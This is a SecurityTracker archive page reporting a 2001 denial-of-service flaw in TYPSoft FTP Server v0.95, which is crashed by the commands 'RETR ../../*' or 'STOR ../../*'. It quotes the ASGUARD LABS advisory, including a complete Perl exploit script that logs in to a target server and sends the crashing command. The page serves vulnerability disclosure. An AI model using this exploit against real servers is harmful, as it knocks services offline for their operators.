Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   


Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker

Category:   Application (File Transfer/Sharing)  >   FTP (TYPSoft) Vendors:   TYPSoft
TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users
SecurityTracker Alert ID:  1002519
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 10 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): v0.95; possibly earlier versions
Description:   ASGUARD LABS reported a denial of service vulnerability in TYPSoft's FTP Server. Remote users can cause the server to crash.

It is reported that if a remote user with access to the FTP service (including anonymous access) sends a specially crafted "STOR" or "RETR" command, the FTP server will consume nearly all CPU resources and will then crash.

Sending the following type of command will apparently trigger the vulnerability:

RETR ../../*


STOR ../../*

Demonstration exploit code is included in the Source Message.

The vendor has reportedly been contacted.

Impact:   A remote user with access to the FTP service, including anonymous access, can issue a specially crafted command to cause the FTP Server to consume nearly all CPU resources and then crash.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
Underlying OS Comments:  tested on Windows 98se [german], Windows 2000 SP1 [german]

Message History:   None.

 Source Message Contents

Date:  Mon, 08 Oct 2001 14:05:00 +0200
Subject:  [ASGUARD-LABS] TYPSoft FTP Server v0.95 STOR/RETR Denial of Service Vulnerability

Content-Type: text/plain;
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;



Release Date	: 	2001-10-04
Affected	:       TYPSoft FTP Server v0.95
Not Affected	:	-
Attack Type	:	Denial Of Service
Credits to	:	Jan Wagner


The TYPSoft FTP Server v0.95 contains a simple D.O.S. which affects the "RETR" and "STOR" Command.


If the Server receives a special formed "STOR" or "RETR" command it consumes about 99% CPU Power
and crashes. The Server must be restarted to operate aggain.

Tested on:

Windows 98se [german]
Windows 2000 SP1 [german]

:Exploit Code:


use IO::Socket;
use Socket;

print "-= ASGUARD LABS EXPLOIT - TYPSoft FTP Server v0.95 =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl <host> <user>
<pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err = "RETR ../../*";

#Both works "STOR" and "RETR"

$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can't connect  to $adr:$prt\n";


print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: can't send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n"  or die
"Error: can't send pass\n";

print $remote "$err/\n" and print "3. Sending : ErrorCode...\n\n"or die
"Error: can't send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;


(still) waiting for TYPsoft statement...



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

Copyright 2015, LLC